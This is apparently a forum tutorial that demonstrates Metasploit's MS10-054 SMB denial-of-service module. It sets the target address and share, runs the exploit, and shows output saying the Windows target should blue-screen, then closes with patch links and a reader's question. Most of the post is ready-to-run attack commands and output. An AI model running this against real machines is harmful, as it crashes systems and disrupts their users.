This is my guide. It is only a demo!
Exploit with Metasploit
msf > use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
msf auxiliary(ms10_054_queryfs_pool_overflow) > info
Name: Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
Version: 9983
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Laurent Gaffie
jduck
Basic options:
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   RHOST     192.168.1.28     yes       The target address
   RPORT     445              yes       The target port
   SMBSHARE                   yes       The name of a readable share on the server
Description:
This module exploits a denial of service flaw in the Microsoft
Windows SMB service on versions of Windows prior to the August 2010
Patch Tuesday. To trigger this bug, you must be able to access a
share with at least read privileges. That generally means you will
need authentication. However, if a system has a guest accessible
share, you can trigger it without any authentication.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2550
http://www.osvdb.org/66974
http://www.microsoft.com/technet/security/bulletin/MS10-054.mspx
http://seclists.org/fulldisclosure/2010/Aug/122
msf auxiliary(ms10_054_queryfs_pool_overflow) > show options
Module options:
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   RHOST                      yes       The target address
   RPORT     445              yes       The target port
   SMBSHARE                   yes       The name of a readable share on the server
msf auxiliary(ms10_054_queryfs_pool_overflow) > set rhost 192.168.10.28
msf auxiliary(ms10_054_queryfs_pool_overflow) > set smbshare Downloads
smbshare => Downloads
msf auxiliary(ms10_054_queryfs_pool_overflow) > show options
Module options:
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   RHOST     192.168.10.28    yes       The target address
   RPORT     445              yes       The target port
   SMBSHARE  Downloads        yes       The name of a readable share on the server
msf auxiliary(ms10_054_queryfs_pool_overflow) > exploit
[*] Sending malformed trans2 request..
[*] The target should encounter a blue screen error now.
[*] Auxiliary module execution completed
msf auxiliary(ms10_054_queryfs_pool_overflow) >
GAME OVER
Solution:
Microsoft has released a set of patches for Windows XP, Vista, 2008,
7, and 2008 R2.
Install the update for your version of Windows:
http://www.microsoft.com/technet/security/bulletin/ms10-054.mspx
Some info:
http://www.exploit-db.com/exploits/14607/
http://www.nessus.org/plugins/index.php?view=single&id=48291
Thanks!!!
Hi, thanks for the guide, but I can't understand the parameter "SMBSHARE". I don't know what to put in this place... Can you help me?
Sorry for my English.
Greetings, friend!!